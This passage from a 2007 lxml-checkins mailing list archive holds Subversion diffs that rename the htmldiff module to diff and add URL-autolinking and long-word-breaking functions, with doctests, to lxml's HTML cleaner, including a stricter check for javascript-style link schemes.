cgi.escape(value, True)) - for name, value in el.attrib.items())) - -def end_tag(el): - """ The text representation of an end tag for a tag. Includes - trailing whitespace when appropriate. """ - if el.tail and start_whitespace_re.search(el.tail): - extra = ' ' - else: - extra = '' - return '</%s>%s' % (el.tag, extra) - -def is_word(tok): - return not tok.startswith('<') - -def is_end_tag(tok): - return tok.startswith('</') - -def is_start_tag(tok): - return tok.startswith('<') and not tok.startswith('</') - -def fixup_ins_del_tags(html): - """ Given an html string, move any <ins> or <del> tags inside of any - block-level elements, e.g. transform <ins><p>word</p></ins> to - <p><ins>word</ins></p> """ - doc = parse_html(html, cleanup=False) - _fixup_ins_del_tags(doc) - html = serialize_html_fragment(doc, drop_outer=True) - return html - -def serialize_html_fragment(el, drop_outer=False): - """ Serialize a single lxml element as HTML. The serialized form - includes the elements tail. - - If drop_outer is true, then don't serialize the outermost tag - """ - - html_xsl = """\ -<xsl:transform xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:output method="html" encoding="UTF-8" /> - <xsl:template match="/"> - <xsl:copy-of select="."/> - </xsl:template> -</xsl:transform> -""" - transform = etree.XSLT(etree.XML(html_xsl)) - assert not isinstance(el, basestring), ( - "You should pass in an element, not a string like %r" % el) - html = str(transform(el)) - if drop_outer: - # Get rid of the extra starting tag: - html = html[html.find('>')+1:] - if drop_outer: - # Get rid of the extra end tag: - html = html[:html.rfind('<')] - if drop_outer: - return html.strip() - else: - return html.lstrip() - -def _fixup_ins_del_tags(doc): - """fixup_ins_del_tags that works on an lxml document in-place - """ - for tag in ['ins', 'del']: - for el in doc.xpath('descendant-or-self::%s' % tag): - if not _contains_block_level_tag(el): - continue - _move_el_inside_block(el, tag=tag) - _merge_element_contents(el) - -def _contains_block_level_tag(el): - """True if the element contains any block-level elements, like <p>, <td>, etc. - """ - if el.tag in block_level_tags or el.tag in block_level_container_tags: - return True - for child in el: - if _contains_block_level_tag(child): - return True - return False - -def _move_el_inside_block(el, tag): - """ helper for _fixup_ins_del_tags; actually takes the <ins> etc tags - and moves them inside any block-level tags. """ - for child in el: - if _contains_block_level_tag(child): - break - else: - import sys - # No block-level tags in any child - children_tag = etree.Element(tag) - children_tag.text = el.text - el.text = None - children_tag.extend(list(el)) - el[:] = [children_tag] - return - for child in list(el): - if _contains_block_level_tag(child): - _move_el_inside_block(child, tag) - if child.tail: - tail_tag = etree.Element(tag) - tail_tag.text = child.tail - child.tail = None - el.insert(el.index(child)+1, tail_tag) - else: - child_tag = etree.Element(tag) - el.replace(child, child_tag) - child_tag.append(child) - if el.text: - text_tag = etree.Element(tag) - text_tag.text = el.text - el.text = None - el.insert(0, text_tag) - -def _merge_element_contents(el): - """ - Removes an element, but merges its contents into its place, e.g., - given <p>Hi <i>there!</i></p>, if you remove the <i> element you get - <p>Hi there!</p> - """ - parent = el.getparent() - text = el.text or '' - if el.tail: - if not len(el): - text += el.tail - else: - if el[-1].tail: - el[-1].tail += el.tail - else: - el[-1].tail = el.tail - index = parent.index(el) - if text: - if index == 0: - previous = None - else: - previous = parent[index-1] - if previous is None: - if parent.text: - parent.text += text - else: - parent.text = text - else: - if previous.tail: - previous.tail += text - else: - previous.tail = text - parent[index:index+1] = el.getchildren() - -class InsensitiveSequenceMatcher(difflib.SequenceMatcher): - """ - Acts like SequenceMatcher, but tries not to find very small equal - blocks amidst large spans of changes - """ - - threshold = 2 - - def get_matching_blocks(self): - size = min(len(self.b), len(self.b)) - threshold = min(self.threshold, size / 4) - actual = difflib.SequenceMatcher.get_matching_blocks(self) - return [item for item in actual - if item[2] > threshold - or not item[2]] - -# def get_matching_blocks(self): -# size = min(len(self.b), len(self.b)) -# threshold = min(self.threshold, size / 4) -# actual = difflib.SequenceMatcher.get_matching_blocks(self) -# last_equal_a = 0 -# eliminate = [] -# for i in xrange(1, len(actual)-1): -# start_diff_length = actual[i][0] - (actual[i-1][0] + actual[i-1][2]) -# end_diff_length = actual[i+1][0] -# for a_pos, b_pos, length in actual: -# if (last_equal_a - a_pos is big -# and length is small -# and next_equal_a is far away): -# continue -# result.append((a_pos, b_pos, length)) -# last_equal_a = a_pos+length -# return result - - -if __name__ == '__main__': - import doctest - doctest.testmod() - Copied: lxml/branch/html/src/lxml/html/tests/test_diff.py (from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.py) ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_htmldiff.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_diff.py Fri Jun 1 20:23:35 2007 @@ -1,12 +1,12 @@ import unittest from lxml.tests.common_imports import doctest -from lxml.html import htmldiff +from lxml.html import diff def test_suite(): suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_htmldiff.txt'), - doctest.DocTestSuite(htmldiff)]) + suite.addTests([doctest.DocFileSuite('test_diff.txt'), + doctest.DocTestSuite(diff)]) return suite if __name__ == '__main__': Copied: lxml/branch/html/src/lxml/html/tests/test_diff.txt (from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt) ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_diff.txt Fri Jun 1 20:23:35 2007 @@ -1,4 +1,4 @@ -htmldiff does HTML comparisons. These are word-based comparisons. +lxml.html.diff does HTML comparisons. These are word-based comparisons. First, a handy function for normalizing whitespace and doing word wrapping:: @@ -12,7 +12,7 @@ Example:: - >>> from lxml.html.htmldiff import htmldiff, split_unbalanced, html_annotate + >>> from lxml.html.diff import htmldiff, html_annotate >>> html1 = '<p>This is some test text with some changes and some same stuff</p>' >>> html2 = '''<p>This is some test textual writing with some changed stuff ... and some same stuff</p>''' @@ -187,36 +187,13 @@ <p><a href="/foo"><span version="0">Hey</span> <span version="1">Guy</span></a></p> +Internals +--------- -Here's a test of a utility function!: +Some utility functions:: - >>> from lxml.html.htmldiff import _merge_element_contents - >>> from lxml import etree - >>> doc = '''<html><body><div> - ... <div id="c1">a b <span id="d1">content</span> c d</div> - ... <div id="c2"><span id="d2">content <b>and more</b> stuff</span> trailing</div> - ... <div id="c3"><b>hi</b><span id="d3"><i>content</i></span></div> - ... <div id="c4"><b>Hi</b> <span id="d4">some stuff<i>more stuff</i></span></div> - ... </div></body></html>''' - >>> doc = etree.HTML(doc) - >>> def show_result(id): - ... el = doc.xpath("//*[@id='d%s']" % id)[0] - ... _merge_element_contents(el) - ... container = doc.xpath("//*[@id='c%s']" % id)[0] - ... print etree.tostring(container).strip() - >>> show_result(1) - <div id="c1">a b content c d</div> - >>> show_result(2) - <div id="c2">content <b>and more</b> stuff trailing</div> - >>> show_result(3) - <div id="c3"><b>hi</b><i>content</i></div> - >>> show_result(4) - <div id="c4"><b>Hi</b> some stuff<i>more stuff</i></div> - -More utility: - - >>> from lxml.html.htmldiff import fixup_ins_del_tags + >>> from lxml.html.diff import fixup_ins_del_tags, split_unbalanced >>> def pfixup(text): ... print fixup_ins_del_tags(text).strip() >>> pfixup('<ins><p>some text <b>and more text</b> and more</p></ins>') @@ -233,7 +210,7 @@ </tr></table> -Testing split_unbalanced: +Testing split_unbalanced:: >>> split_unbalanced(['<a href="blah">', 'hey', '</a>']) ([], ['<a href="blah">', 'hey', '</a>'], []) Deleted: /lxml/branch/html/src/lxml/html/tests/test_htmldiff.py ============================================================================== --- /lxml/branch/html/src/lxml/html/tests/test_htmldiff.py Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,13 +0,0 @@ -import unittest -from lxml.tests.common_imports import doctest - -from lxml.html import htmldiff - -def test_suite(): - suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_htmldiff.txt'), - doctest.DocTestSuite(htmldiff)]) - return suite - -if __name__ == '__main__': - unittest.main() Deleted: /lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt ============================================================================== --- /lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,248 +0,0 @@ -htmldiff does HTML comparisons. These are word-based comparisons. - -First, a handy function for normalizing whitespace and doing word wrapping:: - - >>> import re, textwrap - >>> def pwrapped(text): - ... text = re.sub(r'[ \n\t\r]+', ' ', text) - ... text = textwrap.fill(text) - ... print text - >>> def pdiff(text1, text2): - ... pwrapped(htmldiff(text1, text2)) - -Example:: - - >>> from lxml.html.htmldiff import htmldiff, split_unbalanced, html_annotate - >>> html1 = '<p>This is some test text with some changes and some same stuff</p>' - >>> html2 = '''<p>This is some test textual writing with some changed stuff - ... and some same stuff</p>''' - >>> pdiff(html1, html2) - <p>This is some test <ins>textual writing with some changed - stuff</ins> <del>text with some changes</del> and some same stuff</p> - -Style tags are largely ignored in terms of differences, though markup is not eliminated:: - - >>> html1 = '<p>Hi <i>you guys</i></p>' - >>> html2 = '<p>Hi <i>you</i> guys</p>' - >>> pdiff(html1, html2) - <p>Hi <i>you</i> guys</p> - >>> pdiff('text', '<p>text</p>') - <p>text</p> - >>> pdiff('<i>Hi guys</i> !!', '<i>Hi guy</i> !!') - <i>Hi <ins>guy</ins> <del>guys</del> </i> !! - >>> pdiff('H<i>i</i>', 'Hi') - <ins>Hi</ins> <del>H<i>i</i></del> - >>> pdiff('<i>A B</i> C', '<i>A</i> C') - <i>A <del>B</del> </i> C - >>> pdiff('<i>A B</i> C', '<i>B</i> C') - <i> <del>A</del> B</i> C - >>> pdiff('<p></p>', '<p></p>') - <p></p> - >>> pdiff('<p>Hi</p>', '<p>Bye</p>') - <p><ins>Bye</ins></p> <p><del>Hi</del></p> - >>> pdiff('<p>Hi Guy</p>', '<p>Bye Guy</p>') - <p> <ins>Bye</ins> <del>Hi</del> Guy</p> - >>> pdiff('<p>Hey there</p>', '') - <ins></ins> <p><del>Hey there</del></p> - -Whitespace is ignored, as it's not meaningful in HTML:: - - >>> pdiff('<div>Hi\n\nguys</div>', '<div>Hi guy</div>') - <div>Hi <ins>guy</ins> <del>guys</del> </div> - -Movement between paragraphs is ignored, as tag-based changes are generally ignored:: - >>> - >>> pdiff('<p>Hello</p><p>World</p>', '<p>Hello World</p>') - <p>Hello World</p> - -As a special case, changing the href of a link is displayed, and -images are treated like words: - - >>> pdiff('<a href="http://yahoo.com">search</a>', '<a href="http://google.com">search</a>') - <a href="http://google.com">search <ins>Link: http://google.com</ins> - <del>Link: http://yahoo.com</del> </a> - >>> pdiff('<p>Print this <img src="print.gif"></p>', '<p>Print this</p>') - <p>Print this <del><img src="print.gif"></del> </p> - >>> pdiff('<a href="http://yahoo.com">search</a>', '<a href="http://yahoo.com">search</a>') - <a href="http://yahoo.com">search</a> - -The sixteen combinations:: - -First "insert start" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>D B C</b') - <b> <ins>D</ins> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>D A C</b>') - <b> <ins>D</ins> A <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>D A B</b>') - <b> <ins>D</ins> A B <del>C</del> </b> - >>> pdiff('<b>A B C</b>', '<b>D A B C</b>') - <b> <ins>D</ins> A B C</b> - -Next, "insert middle" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>D B C</b>') - <b> <ins>D</ins> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>A D C</b>') - <b>A <ins>D</ins> <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>A D B</b>') - <b>A <ins>D</ins> B <del>C</del> </b> - -This one case hits the threshold of our insensitive matching: - - >>> pdiff('<b>A B C</b>', '<b>A D B C</b>') - <b> <ins>A D</ins> <del>A</del> B C</b> - - -Then "insert end" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>B C D</b>') - <b> <del>A</del> B C <ins>D</ins> </b> - >>> pdiff('<b>A B C</b>', '<b>A C D</b>') - <b>A <del>B</del> C <ins>D</ins> </b> - >>> pdiff('<b>A B C</b>', '<b>A B D</b>') - <b>A B <ins>D</ins> <del>C</del> </b> - >>> pdiff('<b>A B C</b>', '<b>A B C D</b>') - <b>A B C <ins>D</ins> </b> - -Then no insert (del start/middle/end): - - >>> pdiff('<b>A B C</b>', '<b>B C</b>') - <b> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>A C</b>') - <b>A <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>A B</b>') - <b>A B <del>C</del> </b> - - >>> pdiff('<b>A B</b> C', '<b>A B</b>') - <b>A B</b> <del>C</del> - >>> pdiff('<b>A B</b> <b>C</b>', '<b>A B</b>') - <b>A B</b> <del><b>C</b></del> - >>> pdiff('A <p><b>hey there</b> <i>how are you?</i></p>', 'A') - A <p><del><b>hey there</b> <i>how are you?</i></del></p> - -Testing a larger document, to make sure there are not weird -unnecessary parallels found: - - >>> pdiff(''' - ... <p>This is a test document with many words in it that goes on - ... for a while and doesn't have anything do to with the next - ... document that we match this against</p>''', ''' - ... <p>This is another document with few similarities to the preceding - ... one, but enough that it may have overlap that could turn into - ... a confusing series of deletes and inserts. - ... </p>''') - <p><ins>This is another document with few similarities to the - preceding one, but enough that it may have overlap that could turn - into a confusing series of deletes and inserts. </ins></p> - <p><del>This is a test document with many words in it that goes on for - a while and doesn't have anything do to with the next document that we - match this against</del></p> - - - -Annotation of content can also be done, where every bit of content is -marked up with information about where it came from. - -First, some setup; note that html_annotate is called with a sequence -of documents and the annotation associated with that document. We'll -just use indexes, but you could use author or timestamp information. - - >>> def markup(text, annotation): - ... return '<span version="%s">%s</span>' % (annotation, text) - >>> def panno(*docs): - ... pwrapped(html_annotate([(doc, index) for index, doc in enumerate(docs)], - ... markup=markup)) - -Now, a sequence of documents: - - >>> panno('Hello cruel world', 'Hi cruel world', 'Hi world') - <span version="1">Hi</span> <span version="0">world</span> - >>> panno('A similar document', 'A similar document', - ... 'A similar document here') - <span version="0">A similar document</span> <span - version="2">here</span> - >>> panno('<p>P1 para</p><p>P2 para</p>', '<p>P1 para</p><p>P3 foo</p>') - <p><span version="0">P1 para</span></p><p><span version="1">P3 - foo</span></p> - >>> panno('Hello<p>There World</p>','Hello<p>There Town</p>') - <span version="0">Hello</span><p><span version="0">There</span> <span - version="1">Town</span></p> - >>> panno('<p>Hello</p>There World','<p>Hello</p>There Town') - <p><span version="0">Hello</span></p><span version="0">There</span> - <span version="1">Town</span> - >>> panno('<p>Hello</p><p>There World</p>','<p>Hello</p><p>There Town</p>') - <p><span version="0">Hello</span></p><p><span version="0">There</span> - <span version="1">Town</span></p> - >>> panno('<p>Hi <img src="/foo"> You</p>', - ... '<p>Hi You</p>', - ... '<p>Hi You <img src="/bar"></p>') - <p><span version="0">Hi</span> <span version="1">You</span> <span - version="2"><img src="/bar"></span></p> - >>> panno('<p><a href="/foo">Hey</a></p>', - ... '<p><a href="/bar">Hey</a></p>') - <p><a href="/bar"><span version="0">Hey</span></a></p> - >>> panno('<p><a href="/foo">Hey You</a></p>', - ... '<p><a href="/foo">Hey Guy</a></p>') - <p><a href="/foo"><span version="0">Hey</span> <span - version="1">Guy</span></a></p> - - - -Here's a test of a utility function!: - - >>> from lxml.html.htmldiff import _merge_element_contents - >>> from lxml import etree - >>> doc = '''<html><body><div> - ... <div id="c1">a b <span id="d1">content</span> c d</div> - ... <div id="c2"><span id="d2">content <b>and more</b> stuff</span> trailing</div> - ... <div id="c3"><b>hi</b><span id="d3"><i>content</i></span></div> - ... <div id="c4"><b>Hi</b> <span id="d4">some stuff<i>more stuff</i></span></div> - ... </div></body></html>''' - >>> doc = etree.HTML(doc) - >>> def show_result(id): - ... el = doc.xpath("//*[@id='d%s']" % id)[0] - ... _merge_element_contents(el) - ... container = doc.xpath("//*[@id='c%s']" % id)[0] - ... print etree.tostring(container).strip() - >>> show_result(1) - <div id="c1">a b content c d</div> - >>> show_result(2) - <div id="c2">content <b>and more</b> stuff trailing</div> - >>> show_result(3) - <div id="c3"><b>hi</b><i>content</i></div> - >>> show_result(4) - <div id="c4"><b>Hi</b> some stuff<i>more stuff</i></div> - -More utility: - - >>> from lxml.html.htmldiff import fixup_ins_del_tags - >>> def pfixup(text): - ... print fixup_ins_del_tags(text).strip() - >>> pfixup('<ins><p>some text <b>and more text</b> and more</p></ins>') - <p><ins>some text <b>and more text</b> and more</ins></p> - >>> pfixup('<p><ins>Hi!</ins> you</p>') - <p><ins>Hi!</ins> you</p> - >>> pfixup('<div>Some text <ins>and <p>more text</p></ins> </div>') - <div>Some text <ins>and </ins><p><ins>more text</ins></p> </div> - >>> pfixup(''' - ... <ins><table><tr><td>One table</td><td>More stuff</td></tr></table></ins>''') - <table><tr> - <td><ins>One table</ins></td> - <td><ins>More stuff</ins></td> - </tr></table> - - -Testing split_unbalanced: - - >>> split_unbalanced(['<a href="blah">', 'hey', '</a>']) - ([], ['<a href="blah">', 'hey', '</a>'], []) - >>> split_unbalanced(['<a href="blah">', 'hey']) - (['<a href="blah">'], ['hey'], []) - >>> split_unbalanced(['Hey', '</i>', 'You', '</b>']) - ([], ['Hey', 'You'], ['</i>', '</b>']) - >>> split_unbalanced(['So', '</i>', 'Hi', '<b>', 'There', '</b>']) - ([], ['So', 'Hi', '<b>', 'There', '</b>'], ['</i>']) - >>> split_unbalanced(['So', '</i>', 'Hi', '<b>', 'There']) - (['<b>'], ['So', 'Hi', 'There'], ['</i>']) - From ianb at codespeak.net Fri Jun 1 21:43:00 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 21:43:00 +0200 (CEST) Subject: [Lxml-checkins] r43979 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601194300.9C17E80AE@code0.codespeak.net> Author: ianb Date: Fri Jun 1 21:42:58 2007 New Revision: 43979 Added: lxml/branch/html/src/lxml/html/tests/test_autolink.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_autolink.txt (contents, props changed) Modified: lxml/branch/html/src/lxml/html/clean.py Log: Added an autolinking function Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 21:42:58 2007 @@ -3,23 +3,30 @@ from lxml.html import defs from lxml.html import parse, tostring -__all__ = ['clean_html', 'clean'] +__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html'] -# FIXME: I should study this for more ideas: http://feedparser.org/docs/html-sanitization.html -# Other on* attributes that aren't standard? -# Try these tests: http://feedparser.org/tests/wellformed/sanitize/ -# Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# max width for words +# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl +# I have multiple kinds of schemes searched; but should schemes be +# whitelisted instead? +# max width for words (but not in pre or textarea) # max height? -# autolink? -# CSS stuff? -# remove images? +# autolink? (don't autolink in textarea, pre, code) +# remove images? Also in CSS? background attribute? +# Some way to whitelist object, iframe, etc (e.g., if you want to +# allow *just* embedded YouTube movies) +# Log what was deleted and why? # This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( r'expression\(.*?\)', re.S|re.I) +# All kinds of schemes besides just javascript: that can cause +# execution: +_javascript_scheme_re = re.compile( + r'\s*(?:javascript|jscript|livescript|vbscript|about):', re.I) +_whitespace_re = re.compile(r'\s+') + def clean_html(html, **kw): """ Like clean(), but takes a text input document, and returns a text @@ -93,7 +100,7 @@ Remove any form tags ``annoying_tags``: - Tags that aren't *wrong*, but are annoying. ``<blink>`` (FIXME: marquee?) + Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marque>`` ``remove_tags``: A list of tags to remove. @@ -190,7 +197,7 @@ remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) if annoying_tags: - remove_tags.extend(['blink']) + remove_tags.extend(['blink', 'marque']) bad = [] for el in _itertree(doc): if el.tag in kill_tags: @@ -238,8 +245,136 @@ el.attrib['rel'] = 'nofollow' def _remove_javascript(link): - if link.strip().startswith('javascript:'): + # links like "j a v a s c r i p t:" might be interpreted in IE + new = _whitespace_re.sub('', link) + if _javascript_scheme_re.search(new): # FIXME: should this be None to delete? return '' return link +_link_regexes = [ + re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?)', re.I), + # This is conservative, but autolinking can be a bit conservative: + re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_._]+[a-z]))', re.I), + ] + +_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a'] + +_avoid_hosts = [ + re.compile(r'^localhost', re.I), + re.compile(r'\bexample\.(?:com|org|net)$', re.I), + re.compile(r'^127\.0\.0\.1$'), + ] + +_avoid_classes = ['nolink'] + +def autolink(el, link_regexes=_link_regexes, + avoid_elements=_avoid_elements, + avoid_hosts=_avoid_hosts, + avoid_classes=_avoid_classes): + """ + Turn any URLs into links. + + It will search for links identified by the given regular + expressions (by default mailto and http(s) links). + + It won't link text in an element in avoid_elements, or an element + with a class in avoid_classes. It won't link to anything with a + host that matches one of the regular expressions in avoid_hosts + (default localhost and 127.0.0.1). + + If you pass in an element, the elements tail will not be + substituted, only the contents of the element. + """ + if el.tag in avoid_elements: + return + class_name = el.attrib.get('class') + if class_name: + class_name = class_name.split() + for match_class in avoid_classes: + if match_class in class_name: + return + for child in list(el): + autolink(child, link_regexes=link_regexes, + avoid_elements=avoid_elements, + avoid_hosts=avoid_hosts, + avoid_classes=avoid_classes) + if child.tail: + text, tail_children = _link_text( + child.tail, link_regexes, avoid_hosts, factory=el.makeelement) + if tail_children: + child.tail = text + index = el.index(child) + el[index+1:index+1] = tail_children + if el.text: + text, pre_children = _link_text( + el.text, link_regexes, avoid_hosts, factory=el.makeelement) + if pre_children: + el.text = text + el[:0] = pre_children + +def _link_text(text, link_regexes, avoid_hosts, factory): + leading_text = '' + links = [] + last_pos = 0 + while 1: + best_match, best_pos = None, None + for regex in link_regexes: + regex_pos = last_pos + while 1: + match = regex.search(text, pos=regex_pos) + if match is None: + break + host = match.group('host') + for host_regex in avoid_hosts: + if host_regex.search(host): + regex_pos = match.end() + break + else: + break + if match is None: + continue + if best_pos is None or match.start() < best_pos: + best_match = match + best_pos = match.start() + if best_match is None: + # No more matches + if links: + assert not links[-1].tail + links[-1].tail = text + else: + assert not leading_text + leading_text = text + break + link = best_match.group(0) + end = best_match.end() + if link.endswith('.') or link.endswith(','): + # These punctuation marks shouldn't end a link + end -= 1 + link = link[:-1] + prev_text = text[:best_match.start()] + if links: + assert not links[-1].tail + links[-1].tail = prev_text + else: + assert not leading_text + leading_text = prev_text + anchor = factory('a') + anchor.attrib['href'] = link + body = best_match.group('body') + if not body: + body = link + if body.endswith('.') or body.endswith(','): + body = body[:-1] + anchor.text = body + links.append(anchor) + text = text[end:] + return leading_text, links + +def autolink_html(html, *args, **kw): + doc = parse(html) + autolink(doc, *args, **kw) + return tostring(doc) + + + Added: lxml/branch/html/src/lxml/html/tests/test_autolink.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.py Fri Jun 1 21:42:58 2007 @@ -0,0 +1,10 @@ +import unittest +from lxml.tests.common_imports import doctest + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_autolink.txt')]) + return suite + +if __name__ == '__main__': + unittest.main() Added: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Fri Jun 1 21:42:58 2007 @@ -0,0 +1,37 @@ +This tests autolink:: + + >>> from lxml.html import usedoctest + >>> from lxml.html.clean import autolink_html + >>> print autolink_html(''' + ... <div>Link here: http://test.com/foo.html.</div> + ... ''') + <div>Link here: <a href="http://test.com/foo.html">http://test.com/foo.html</a>.</div> + >>> print autolink_html(''' + ... <div>Mail me at mailto:ianb at test.com or http://myhome.com</div> + ... ''') + <div>Mail me at <a href="mailto:ianb at test.com">ianb at test.com</a> + or <a href="http://myhome.com">http://myhome.com</a></div> + >>> print autolink_html(''' + ... <div>The <b>great</b> thing is the http://link.com links <i>and</i> + ... the http://foobar.com links.</div>''') + <div>The <b>great</b> thing is the <a href="http://link.com">http://link.com</a> links <i>and</i> + the <a href="http://foobar.com">http://foobar.com</a> links.</div> + +Some cases that won't be caught (on purpose):: + + >>> print autolink_html(''' + ... <div>A link to http://localhost/foo/bar won't, but a link to + ... http://test.com will</div>''') + <div>A link to http://localhost/foo/bar won't, but a link to + <a href="http://test.com">http://test.com</a> will</div> + >>> print autolink_html(''' + ... <div>A link in <textarea>http://test.com</textarea></div>''') + <div>A link in <textarea>http://test.com</textarea></div> + >>> print autolink_html(''' + ... <div>A link in <a href="http://foo.com">http://bar.com</a></div>''') + <div>A link in <a href="http://foo.com">http://bar.com</a></div> + >>> print autolink_html(''' + ... <div>A link in <code>http://foo.com</code> or + ... <span class="nolink">http://bar.com</span></div>''') + <div>A link in <code>http://foo.com</code> or + <span class="nolink">http://bar.com</span></div> From ianb at codespeak.net Fri Jun 1 22:40:07 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 22:40:07 +0200 (CEST) Subject: [Lxml-checkins] r43982 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601204007.30FE5807C@code0.codespeak.net> Author: ianb Date: Fri Jun 1 22:40:06 2007 New Revision: 43982 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_autolink.txt Log: Added long word breaking Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 22:40:06 2007 @@ -3,14 +3,14 @@ from lxml.html import defs from lxml.html import parse, tostring -__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html'] +__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', + 'word_break', 'word_break_html'] # Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl +# Particularly the CSS cleaning; most of the tag cleaning is integrated now # I have multiple kinds of schemes searched; but should schemes be # whitelisted instead? -# max width for words (but not in pre or textarea) # max height? -# autolink? (don't autolink in textarea, pre, code) # remove images? Also in CSS? background attribute? # Some way to whitelist object, iframe, etc (e.g., if you want to # allow *just* embedded YouTube movies) @@ -376,5 +376,82 @@ autolink(doc, *args, **kw) return tostring(doc) - - +_avoid_word_break_elements = ['pre', 'textarea', 'code'] +_avoid_word_break_classes = ['nobreak'] + +def word_break(el, max_width=40, + avoid_elements=_avoid_word_break_elements, + avoid_classes=_avoid_word_break_classes, + break_character=u'\u200b'): + """ + Breaks any long words found in the body of the text (not attributes). + + Doesn't effect any of the tags in avoid_elements, by default + textarea and pre + + Breaks words by inserting ​, which is a unicode character + for Zero Width Space character. This generally takes up no space + in rendering, but does copy as a space, and in monospace contexts + usually takes up space. + + See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion + """ + # Character suggestion of ​ comes from: + # http://www.cs.tut.fi/~jkorpela/html/nobr.html + if el.tag in _avoid_word_break_elements: + return + class_name = el.attrib.get('class') + if class_name: + dont_break = False + class_name = class_name.split() + for avoid in avoid_classes: + if avoid in class_name: + dont_break = True + break + if dont_break: + return + if el.text: + el.text = _break_text(el.text, max_width, break_character) + for child in el: + word_break(child, max_width=max_width, + avoid_elements=avoid_elements, + avoid_classes=avoid_classes, + break_character=break_character) + if child.tail: + child.tail = _break_text(child.tail, max_width, break_character) + +def word_break_html(html, *args, **kw): + doc = parse(html) + word_break(doc, *args, **kw) + return tostring(doc) + +def _break_text(text, max_width, break_character): + words = text.split() + for word in words: + if len(word) > max_width: + replacement = _insert_break(word, max_width, break_character) + text = text.replace(word, replacement) + return text + +_break_prefer_re = re.compile(r'[^a-z]', re.I) + +def _insert_break(word, width, break_character): + orig_word = word + result = '' + while len(word) > width: + start = word[:width] + breaks = list(_break_prefer_re.finditer(start)) + if breaks: + last_break = breaks[-1] + # Only walk back up to 10 characters to find a nice break: + if last_break.end() > width-10: + # FIXME: should the break character be at the end of the + # chunk, or the beginning of the next chunk? + start = word[:last_break.end()] + result += start + break_character + word = word[len(start):] + result += word + return result + + + Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_autolink.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Fri Jun 1 22:40:06 2007 @@ -35,3 +35,28 @@ ... <span class="nolink">http://bar.com</span></div>''') <div>A link in <code>http://foo.com</code> or <span class="nolink">http://bar.com</span></div> + +There's also a word wrapping function, that should probably be run +after autolink:: + + >>> from lxml.html.clean import word_break_html + >>> def pascii(s): + ... print s.decode('utf8').encode('ascii', 'xmlcharrefreplace') + >>> pascii(word_break_html(''' + ... <div>Hey you + ... 12345678901234567890123456789012345678901234567890</div>''')) + <div>Hey you + 1234567890123456789012345678901234567890​1234567890</div> + +Not everything is broken: + + >>> pascii(word_break_html(''' + ... <div>Hey you + ... <code>12345678901234567890123456789012345678901234567890</code></div>''')) + <div>Hey you + <code>12345678901234567890123456789012345678901234567890</code></div> + >>> pascii(word_break_html(''' + ... <a href="12345678901234567890123456789012345678901234567890">text</a>''')) + <a href="12345678901234567890123456789012345678901234567890">text</a> + + \ No newline at end of file From ianb at codespeak.net Fri Jun 1 22:43:28 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 22:43:28 +0200 (CEST) Subject: [Lxml-checkins] r43983 - lxml/branch/html/src/lxml/html Message-ID: <20070601204328.580968091@code0.codespeak.net> Author: ianb Date: Fri Jun 1 22:43:22 2007 New Revision: 43983 Modified: 